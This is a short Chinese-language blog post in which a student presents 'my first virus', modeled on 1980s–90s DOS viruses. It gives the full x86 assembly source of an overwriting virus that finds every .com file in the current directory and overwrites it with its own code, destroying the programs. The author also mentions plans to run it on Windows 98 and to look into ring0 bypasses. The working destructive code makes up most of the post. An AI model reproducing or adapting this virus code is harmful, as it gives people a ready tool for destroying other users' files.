自己写的第一个病毒(仿的)

 

下载拉1000多个"史前时期"(82--98年左右)的小病毒 全汇编 (1K---200K) 看拉3个

其实很简单就是几个DOS中断(文件 磁盘操作相关)

自己试着写拉一个：将本目录的*.com（可以随便改想感染的类型）逐个写入指定长度的内容

源代码如下:

data_1e  equ 9Eh   
seg_a  segment byte public
assume cs:seg_a, ds:seg_a

org 100h
 
COPYR  proc far
 
start:
  mov ah,4Eh   
  mov cl,20h   
  mov dx,offset data_3 
  int 21h   
      
loc_1:
  mov dx,data_1e  
  mov ax,3D01h
  int 21h   
      
  mov bx,ax
  mov dx,offset ds:[100h] 
  mov cl,2Eh   
  mov ah,40h   
  int 21h   
      
  mov ah,3Eh   
  int 21h   
      
  mov ah,4Fh   
  int 21h   
      
  jnc loc_1   
  int 20h   
data_3  db 2Ah                                      ;*.com的ascii码（十六进制）
  db  2Eh, 43h, 4Fh, 4Dh, 00h
 
COPYR  endp
 
seg_a  ends
 
 
 
  end start

效果图看相册　

我用的是诺顿　xp下能被检出　但是不能运行　会抛异常（ＸＰ下禁止中断，用驱动突破ring0级限制　我正在研究　还不会　：）　）

正在下载９８的镜象 用VPC虚上　程序在９８上跑　就能运拉　我估计　呵呵

ps:我写博客的目的是督促自己　寒假学习一下　下学期就要去公司实习拉　别什么都忘拉